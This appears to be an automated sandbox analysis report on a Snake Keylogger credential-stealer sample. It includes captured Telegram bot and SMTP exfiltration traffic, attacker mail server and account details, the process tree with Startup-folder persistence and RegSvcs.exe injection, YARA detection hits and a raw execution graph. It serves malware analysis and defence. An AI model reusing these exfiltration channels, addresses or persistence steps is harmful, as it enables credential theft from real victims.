2025-01-10 17:47:00 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
18         | 192.168.2.4 | 49771       | 104.21.64.1    | 443              | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-10 17:47:01 UTC | 85                | OUT       | GET /xml/8.46.123.189 HTTP/1.1
                        |                   |           | Host: reallyfreegeoip.org
                        |                   |           | Connection: Keep-Alive
2025-01-10 17:47:01 UTC | 858               | IN        | HTTP/1.1 200 OK
                        |                   |           | Date: Fri, 10 Jan 2025 17:47:01 GMT
                        |                   |           | Content-Type: text/xml
                        |                   |           | Content-Length: 362
                        |                   |           | Connection: close
                        |                   |           | Age: 1846010
                        |                   |           | Cache-Control: max-age=31536000
                        |                   |           | cf-cache-status: HIT
                        |                   |           | last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                        |                   |           | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2Hsgx3MeNWbbZe01tB15Z7mJMWUp6ijFNb8DTDnyHgzMjP3yV4cbmNSLgpdaEWyuYmyh6s2A7%2FKuiCN%2FEUV%2BMr%2BzY7IL7%2FZcKOmUOgPaQF7wf6x7v3P7zjHxMQOl3ouc7mvRCeo"}],"group":"cf-nel","max_age":604800}
                        |                   |           | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        |                   |           | Server: cloudflare
                        |                   |           | CF-RAY: 8ffe7d67a8d8c358-EWR
                        |                   |           | alt-svc: h3=":443"; ma=86400
                        |                   |           | server-timing: cfL4;desc="?proto=TCP&rtt=9471&min_rtt=9471&rtt_var=4735&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=54428&cwnd=155&unsent_bytes=0&cid=937c02f96c7f721b&ts=170&x=0"
2025-01-10 17:47:01 UTC | 362               | IN        | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                        |                   |           | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
19         | 192.168.2.4 | 49772       | 149.154.167.220 | 443              | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-10 17:47:02 UTC | 349               | OUT       | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:51:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                        |                   |           | Host: api.telegram.org
                        |                   |           | Connection: Keep-Alive
2025-01-10 17:47:02 UTC | 344               | IN        | HTTP/1.1 404 Not Found
                        |                   |           | Server: nginx/1.18.0
                        |                   |           | Date: Fri, 10 Jan 2025 17:47:02 GMT
                        |                   |           | Content-Type: application/json
                        |                   |           | Content-Length: 55
                        |                   |           | Connection: close
                        |                   |           | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        |                   |           | Access-Control-Allow-Origin: *
                        |                   |           | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 17:47:02 UTC | 55                | IN        | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                        |                   |           | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp                           | Source Port | Dest Port | Source IP      | Dest IP        | Commands
Jan 10, 2025 18:46:53.611176968 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 220 mail-st-11.markum.net ESMTP MailEnable Service, Version: 10.31--10.31 ready at 01/10/25 20:46:53
Jan 10, 2025 18:46:53.611437082 CET | 49759       | 587       | 192.168.2.4    | 178.210.170.40 | EHLO 367706
Jan 10, 2025 18:46:53.832989931 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 250-mail-st-11.markum.net [8.46.123.189], this server offers 6 extensions
                                    |             |           |                |                | 250-AUTH CRAM-MD5 LOGIN
                                    |             |           |                |                | 250-SIZE 40960000
                                    |             |           |                |                | 250-HELP
                                    |             |           |                |                | 250-AUTH=LOGIN
                                    |             |           |                |                | 250-XSAVETOSENT
                                    |             |           |                |                | 250 X-SAVETOSENT
Jan 10, 2025 18:46:53.834193945 CET | 49759       | 587       | 192.168.2.4    | 178.210.170.40 | AUTH login aW5mb0BzdGFuZGFydGFzYW5zb3IuY29t
Jan 10, 2025 18:46:54.063441992 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 334 UGFzc3dvcmQ6
Jan 10, 2025 18:46:54.307893991 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 235 Authenticated
Jan 10, 2025 18:46:54.308298111 CET | 49759       | 587       | 192.168.2.4    | 178.210.170.40 | MAIL FROM:<info@standartasansor.com>
Jan 10, 2025 18:46:54.530957937 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 250 Requested mail action okay, completed
Jan 10, 2025 18:46:54.531132936 CET | 49759       | 587       | 192.168.2.4    | 178.210.170.40 | RCPT TO:<kimmayer766@gmail.com>
Jan 10, 2025 18:46:54.779189110 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 250 Requested mail action okay, completed
Jan 10, 2025 18:46:54.779405117 CET | 49759       | 587       | 192.168.2.4    | 178.210.170.40 | DATA
Jan 10, 2025 18:46:55.030709028 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 354 Start mail input; end with <CRLF>.<CRLF>
Jan 10, 2025 18:46:55.031516075 CET | 49759       | 587       | 192.168.2.4    | 178.210.170.40 | .
Jan 10, 2025 18:46:55.268027067 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 250 Requested mail action okay, completed
Jan 10, 2025 18:47:08.671487093 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 220 mail-st-11.markum.net ESMTP MailEnable Service, Version: 10.31--10.31 ready at 01/10/25 20:47:08
Jan 10, 2025 18:47:08.671659946 CET | 49773       | 587       | 192.168.2.4    | 178.210.170.40 | EHLO 367706
Jan 10, 2025 18:47:08.930634022 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 250-mail-st-11.markum.net [8.46.123.189], this server offers 6 extensions
                                    |             |           |                |                | 250-AUTH CRAM-MD5 LOGIN
                                    |             |           |                |                | 250-SIZE 40960000
                                    |             |           |                |                | 250-HELP
                                    |             |           |                |                | 250-AUTH=LOGIN
                                    |             |           |                |                | 250-XSAVETOSENT
                                    |             |           |                |                | 250 X-SAVETOSENT
Jan 10, 2025 18:47:08.930921078 CET | 49773       | 587       | 192.168.2.4    | 178.210.170.40 | AUTH login aW5mb0BzdGFuZGFydGFzYW5zb3IuY29t
Jan 10, 2025 18:47:09.167845964 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 334 UGFzc3dvcmQ6
Jan 10, 2025 18:47:09.397497892 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 235 Authenticated
Jan 10, 2025 18:47:09.397691965 CET | 49773       | 587       | 192.168.2.4    | 178.210.170.40 | MAIL FROM:<info@standartasansor.com>
Jan 10, 2025 18:47:09.619775057 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 250 Requested mail action okay, completed
Jan 10, 2025 18:47:09.619944096 CET | 49773       | 587       | 192.168.2.4    | 178.210.170.40 | RCPT TO:<kimmayer766@gmail.com>
Jan 10, 2025 18:47:09.843091965 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 250 Requested mail action okay, completed
Jan 10, 2025 18:47:09.843266964 CET | 49773       | 587       | 192.168.2.4    | 178.210.170.40 | DATA
Jan 10, 2025 18:47:10.105071068 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 354 Start mail input; end with <CRLF>.<CRLF>
Jan 10, 2025 18:47:10.106046915 CET | 49773       | 587       | 192.168.2.4    | 178.210.170.40 | .
Jan 10, 2025 18:47:10.488493919 CET | 587         | 49773     | 178.210.170.40 | 192.168.2.4    | 250 Requested mail action okay, completed
Jan 10, 2025 18:48:32.499456882 CET | 49759       | 587       | 192.168.2.4    | 178.210.170.40 | QUIT
Jan 10, 2025 18:48:32.721909046 CET | 587         | 49759     | 178.210.170.40 | 192.168.2.4    | 221 Service closing transmission channel

Target ID: 0
Start time: 12:46:26
Start date: 10/01/2025
Path: C:\Users\user\Desktop\AHSlIDftf1.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\AHSlIDftf1.exe"
Imagebase: 0xd50000
File size: 1'109'504 bytes
MD5 hash: 6A0297E362831D810A049E0EF860147E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 12:46:30
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\konked\Sancerre.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\AHSlIDftf1.exe"
Imagebase: 0x570000
File size: 1'109'504 bytes
MD5 hash: 6A0297E362831D810A049E0EF860147E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 74%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 2
Start time: 12:46:33
Start date: 10/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\AHSlIDftf1.exe"
Imagebase: 0x640000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 4
Start time: 12:46:44
Start date: 10/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs"
Imagebase: 0x7ff651f10000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 12:46:44
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\konked\Sancerre.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\konked\Sancerre.exe"
Imagebase: 0x570000
File size: 1'109'504 bytes
MD5 hash: 6A0297E362831D810A049E0EF860147E
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:12:46:48
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\konked\Sancerre.exe"
                                                                                                          Imagebase:0xbf0000
                                                                                                          File size:45'984 bytes
                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:false


Execution Graph

Execution Coverage:2.8%
Dynamic/Decrypted Code Coverage:0.9%
Signature Coverage:4.9%
Total number of Nodes:1979
Total number of Limit Nodes:41
96496->96497 96498 dbc276 96496->96498 96522 d53923 96497->96522 96498->96492 96500 dbc25f KillTimer SetTimer 96500->96498 96501 dbc1a0 96501->96500 96502 dbc251 Shell_NotifyIconW 96501->96502 96502->96500 96503->96481 96504->96492 96505->96491 96506->96492 96507->96467 96508->96488 96509->96494 96511 d53862 ___scrt_fastfail 96510->96511 96593 d54212 96511->96593 96514 d538e8 96516 d53906 Shell_NotifyIconW 96514->96516 96517 d93386 Shell_NotifyIconW 96514->96517 96518 d53923 24 API calls 96516->96518 96519 d5391c 96518->96519 96519->96490 96520->96490 96521->96483 96523 d53a13 96522->96523 96524 d5393f 96522->96524 96523->96501 96544 d56270 96524->96544 96527 d93393 LoadStringW 96530 d933ad 96527->96530 96528 d5395a 96529 d56b57 22 API calls 96528->96529 96531 d5396f 96529->96531 96534 d5a8c7 22 API calls 96530->96534 96538 d53994 ___scrt_fastfail 96530->96538 96532 d933c9 96531->96532 96533 d5397c 96531->96533 96536 d56350 22 API calls 96532->96536 96533->96530 96535 d53986 96533->96535 96534->96538 96549 d56350 96535->96549 96539 d933d7 96536->96539 96541 d539f9 Shell_NotifyIconW 96538->96541 96539->96538 96558 d533c6 96539->96558 96541->96523 96542 d933f9 96543 d533c6 22 API calls 96542->96543 96543->96538 96545 d6fe0b 22 API calls 96544->96545 96546 d56295 96545->96546 96547 d6fddb 22 API calls 96546->96547 96548 d5394d 96547->96548 96548->96527 96548->96528 96550 d56362 96549->96550 96551 d94a51 96549->96551 96567 d56373 96550->96567 96577 d54a88 22 API calls __fread_nolock 96551->96577 96554 d5636e 96554->96538 96555 d94a5b 96556 d94a67 96555->96556 96557 d5a8c7 22 API calls 96555->96557 96557->96556 96559 d930bb 96558->96559 96560 d533dd 96558->96560 96562 d6fddb 22 API calls 96559->96562 96583 d533ee 96560->96583 96564 d930c5 _wcslen 96562->96564 96563 d533e8 96563->96542 96565 d6fe0b 22 API calls 96564->96565 96566 d930fe __fread_nolock 96565->96566 96568 d563b6 __fread_nolock 96567->96568 96569 d56382 96567->96569 96568->96554 96569->96568 96570 d94a82 
96569->96570 96571 d563a9 96569->96571 96573 d6fddb 22 API calls 96570->96573 96578 d5a587 96571->96578 96574 d94a91 96573->96574 96575 d6fe0b 22 API calls 96574->96575 96576 d94ac5 __fread_nolock 96575->96576 96577->96555 96579 d5a59d 96578->96579 96582 d5a598 __fread_nolock 96578->96582 96580 d9f80f 96579->96580 96581 d6fe0b 22 API calls 96579->96581 96581->96582 96582->96568 96584 d533fe _wcslen 96583->96584 96585 d9311d 96584->96585 96586 d53411 96584->96586 96588 d6fddb 22 API calls 96585->96588 96587 d5a587 22 API calls 96586->96587 96589 d5341e __fread_nolock 96587->96589 96590 d93127 96588->96590 96589->96563 96591 d6fe0b 22 API calls 96590->96591 96592 d93157 __fread_nolock 96591->96592 96594 d538b7 96593->96594 96595 d935a4 96593->96595 96594->96514 96597 dbc874 42 API calls _strftime 96594->96597 96595->96594 96596 d935ad DestroyIcon 96595->96596 96596->96594 96597->96514 96598 d51033 96603 d54c91 96598->96603 96602 d51042 96604 d5a961 22 API calls 96603->96604 96605 d54cff 96604->96605 96611 d53af0 96605->96611 96608 d54d9c 96609 d51038 96608->96609 96614 d551f7 22 API calls __fread_nolock 96608->96614 96610 d700a3 29 API calls __onexit 96609->96610 96610->96602 96615 d53b1c 96611->96615 96614->96608 96616 d53b0f 96615->96616 96617 d53b29 96615->96617 96616->96608 96617->96616 96618 d53b30 RegOpenKeyExW 96617->96618 96618->96616 96619 d53b4a RegQueryValueExW 96618->96619 96620 d53b80 RegCloseKey 96619->96620 96621 d53b6b 96619->96621 96620->96616 96621->96620 96622 d5f7bf 96623 d5fcb6 96622->96623 96624 d5f7d3 96622->96624 96712 d5aceb 23 API calls messages 96623->96712 96626 d5fcc2 96624->96626 96627 d6fddb 22 API calls 96624->96627 96713 d5aceb 23 API calls messages 96626->96713 96629 d5f7e5 96627->96629 96629->96626 96630 d5fd3d 96629->96630 96631 d5f83e 96629->96631 96714 dc1155 22 API calls 96630->96714 96648 d5ed9d messages 96631->96648 96657 d61310 96631->96657 96634 d6fddb 22 API calls 96655 d5ec76 messages 96634->96655 96635 d5fef7 96640 d5a8c7 
22 API calls 96635->96640 96635->96648 96638 da4600 96643 d5a8c7 22 API calls 96638->96643 96638->96648 96639 da4b0b 96716 dc359c 82 API calls __wsopen_s 96639->96716 96640->96648 96643->96648 96645 d5a8c7 22 API calls 96645->96655 96646 d70242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96646->96655 96647 d5fbe3 96647->96648 96650 da4bdc 96647->96650 96656 d5f3ae messages 96647->96656 96649 d5a961 22 API calls 96649->96655 96717 dc359c 82 API calls __wsopen_s 96650->96717 96652 da4beb 96718 dc359c 82 API calls __wsopen_s 96652->96718 96653 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96653->96655 96654 d700a3 29 API calls pre_c_initialization 96654->96655 96655->96634 96655->96635 96655->96638 96655->96639 96655->96645 96655->96646 96655->96647 96655->96648 96655->96649 96655->96652 96655->96653 96655->96654 96655->96656 96710 d601e0 235 API calls 2 library calls 96655->96710 96711 d606a0 41 API calls messages 96655->96711 96656->96648 96715 dc359c 82 API calls __wsopen_s 96656->96715 96658 d61376 96657->96658 96659 d617b0 96657->96659 96660 da6331 96658->96660 96663 d61940 9 API calls 96658->96663 96852 d70242 5 API calls __Init_thread_wait 96659->96852 96857 dd709c 235 API calls 96660->96857 96666 d613a0 96663->96666 96664 d617ba 96667 d617fb 96664->96667 96669 d59cb3 22 API calls 96664->96669 96665 da633d 96665->96655 96668 d61940 9 API calls 96666->96668 96671 da6346 96667->96671 96673 d6182c 96667->96673 96670 d613b6 96668->96670 96676 d617d4 96669->96676 96670->96667 96672 d613ec 96670->96672 96858 dc359c 82 API calls __wsopen_s 96671->96858 96672->96671 96679 d61408 __fread_nolock 96672->96679 96854 d5aceb 23 API calls messages 96673->96854 96853 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96676->96853 96677 d61839 96855 d6d217 235 API calls 96677->96855 96679->96677 96681 da636e 96679->96681 96689 d6fddb 22 API calls 
96679->96689 96690 d6fe0b 22 API calls 96679->96690 96696 d6152f 96679->96696 96698 da63b2 96679->96698 96703 d615c7 messages 96679->96703 96827 d5ec40 96679->96827 96859 dc359c 82 API calls __wsopen_s 96681->96859 96683 d61872 96683->96660 96856 d6faeb 23 API calls 96683->96856 96684 d6153c 96687 d61940 9 API calls 96684->96687 96685 da63d1 96861 dd5745 54 API calls _wcslen 96685->96861 96688 d61549 96687->96688 96693 d61940 9 API calls 96688->96693 96688->96703 96689->96679 96690->96679 96691 d6171d 96691->96655 96700 d61563 96693->96700 96696->96684 96696->96685 96860 dc359c 82 API calls __wsopen_s 96698->96860 96700->96703 96704 d5a8c7 22 API calls 96700->96704 96702 d6167b messages 96702->96691 96851 d6ce17 22 API calls messages 96702->96851 96703->96683 96703->96702 96719 d61940 96703->96719 96729 dd959f 96703->96729 96732 dc6ef1 96703->96732 96812 dcf0ec 96703->96812 96821 dbd4ce 96703->96821 96824 dd958b 96703->96824 96862 dc359c 82 API calls __wsopen_s 96703->96862 96704->96703 96710->96655 96711->96655 96712->96626 96713->96630 96714->96648 96715->96648 96716->96648 96717->96652 96718->96648 96720 d61981 96719->96720 96723 d6195d 96719->96723 96863 d70242 5 API calls __Init_thread_wait 96720->96863 96728 d6196e 96723->96728 96865 d70242 5 API calls __Init_thread_wait 96723->96865 96724 d6198b 96724->96723 96864 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96724->96864 96725 d68727 96725->96728 96866 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96725->96866 96728->96703 96867 dd7f59 96729->96867 96731 dd95af 96731->96703 96733 d5a961 22 API calls 96732->96733 96734 dc6f1d 96733->96734 96735 d5a961 22 API calls 96734->96735 96736 dc6f26 96735->96736 96737 dc6f3a 96736->96737 97151 d5b567 39 API calls 96736->97151 96739 d57510 53 API calls 96737->96739 96740 dc6f57 _wcslen 96739->96740 96741 dc6fbc 96740->96741 96742 dc70bf 96740->96742 96754 dc70e9 96740->96754 96744 d57510 53 API calls 96741->96744 96743 
d54ecb 94 API calls 96742->96743 96745 dc70d0 96743->96745 96746 dc6fc8 96744->96746 96747 dc70e5 96745->96747 96748 d54ecb 94 API calls 96745->96748 96750 d5a8c7 22 API calls 96746->96750 96752 dc6fdb 96746->96752 96749 d5a961 22 API calls 96747->96749 96747->96754 96748->96747 96751 dc711a 96749->96751 96750->96752 96755 d5a961 22 API calls 96751->96755 96753 dc7027 96752->96753 96756 dc7005 96752->96756 96760 d5a8c7 22 API calls 96752->96760 96757 d57510 53 API calls 96753->96757 96754->96703 96758 dc7126 96755->96758 96761 d533c6 22 API calls 96756->96761 96762 dc7034 96757->96762 96759 d5a961 22 API calls 96758->96759 96763 dc712f 96759->96763 96760->96756 96764 dc700f 96761->96764 96765 dc703d 96762->96765 96766 dc7047 96762->96766 96768 d5a961 22 API calls 96763->96768 96769 d57510 53 API calls 96764->96769 96770 d5a8c7 22 API calls 96765->96770 97152 dbe199 GetFileAttributesW 96766->97152 96772 dc7138 96768->96772 96773 dc701b 96769->96773 96770->96766 96771 dc7050 96774 dc7063 96771->96774 96777 d54c6d 22 API calls 96771->96777 96775 d57510 53 API calls 96772->96775 96776 d56350 22 API calls 96773->96776 96779 d57510 53 API calls 96774->96779 96785 dc7069 96774->96785 96778 dc7145 96775->96778 96776->96753 96777->96774 97000 d5525f 96778->97000 96781 dc70a0 96779->96781 97153 dbd076 57 API calls 96781->97153 96782 dc7166 96784 d54c6d 22 API calls 96782->96784 96786 dc7175 96784->96786 96785->96754 96787 dc71a9 96786->96787 96789 d54c6d 22 API calls 96786->96789 96788 d5a8c7 22 API calls 96787->96788 96790 dc71ba 96788->96790 96791 dc7186 96789->96791 96792 d56350 22 API calls 96790->96792 96791->96787 96794 d56b57 22 API calls 96791->96794 96793 dc71c8 96792->96793 96795 d56350 22 API calls 96793->96795 96796 dc719b 96794->96796 96798 dc71d6 96795->96798 96797 d56b57 22 API calls 96796->96797 96797->96787 96799 d56350 22 API calls 96798->96799 96800 dc71e4 96799->96800 96801 d57510 53 API calls 96800->96801 96802 dc71f0 96801->96802 97042 dbd7bc 
